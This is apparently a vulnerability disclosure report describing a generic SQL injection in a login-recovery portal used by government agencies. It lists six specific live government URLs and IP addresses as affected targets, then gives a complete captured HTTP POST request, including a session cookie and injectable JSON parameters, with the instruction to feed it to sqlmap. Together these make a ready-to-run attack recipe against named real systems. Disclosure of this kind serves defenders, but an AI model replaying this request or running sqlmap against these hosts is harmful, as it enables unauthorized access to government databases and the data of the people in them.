### Brief description:
As the title says.
### Detailed description:
Generic SQL injection #6 in a system in use by a government.
Cases:
http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp
http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp
http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp
### Proof of vulnerability:
The requests need to be captured one at a time.
http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp
POST parameters:
```
POST /outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
x-requested-with: XMLHttpRequest
Content-Type: application/json
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: wssp.jiangxi.gov.cn:8008
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6

{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}}
```
Run it with sqlmap -r.
[<img src="https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png" alt="QQ图片20150531101614.png" width="600">](https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png)
[<img src="https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png" alt="QQ图片20150531101628.png" width="600">](https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png)